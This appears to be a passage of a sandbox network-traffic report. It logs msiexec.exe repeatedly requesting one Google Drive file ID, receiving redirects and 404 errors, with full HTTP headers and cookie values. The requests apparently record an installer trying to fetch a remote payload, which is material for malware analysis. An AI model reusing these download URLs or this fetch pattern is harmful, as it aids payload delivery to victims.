                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49713 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:56 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
2025-01-10 23:01:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6ZwitzzDVHzMaZHbt_fI4HrJDIW3jeotQvOFG2RIDmnH51xvf4XYYgG16uq6IS7qoOyyeZeTk
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:56 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-bgjapu7qhWEIRpelNOMYiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
2025-01-10 23:01:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PEIfeotqMnUDTX1WwMOzRA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49714 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:01:57 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
2025-01-10 23:01:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:57 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-wTby2aqEQbgfcTwus0auEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.8 | 49715 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:01:58 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:59 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQVhbHzprAn3s_zF5XDSyutG2HCIF0awcD_dJaX7VHvJRzHB2IDfk25flWul1MBzWF8
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:59 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-hV3rwzJN_1gZUwwRYtxpNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:01:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jkE0r8Zl9WCONIsq_SkiMQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.8 | 49716 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:00 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:00 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-zNU86rFcacGQNBS5G1Kw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.8 | 49717 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:01 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRDnqHm8BefEH3lod5D9UW2z172mmK7GUhPOBlLLoO8-kbEwzi1bnAyLNVkV_0hzG56
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:01 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-NA0wlWkxkYa9x389Mga2IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lDE02p-RP54_OVWXw44S-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.8 | 49718 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:02 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:02 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-hVTXnmbWDXyqi_VkCpluGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.8 | 49719 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:03 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgTkDFZ9pp_Fw8duLMVYfMBDavI60UkdmZSHUSUc7LYefcMbcfHz1W8v9kTjGA49EUa3
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:04 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-l8jo_H8gaoWziyYY3X4MzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uLOEFjyPvDp8vuMC_U0r0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.8 | 49720 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:05 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:05 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-WFO1wGsjRyLOMfRLWX2ErQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.8 | 49722 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:06 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:06 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgT042Xx1yiKIpgnG8UgUdnKee3U49v8f1Nxsa6eQvxdiitBrXc4tCxQOm3iQDFXJmsSVip8DyU
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:06 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-ge_DCY5KgpT5ysQFypfODw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
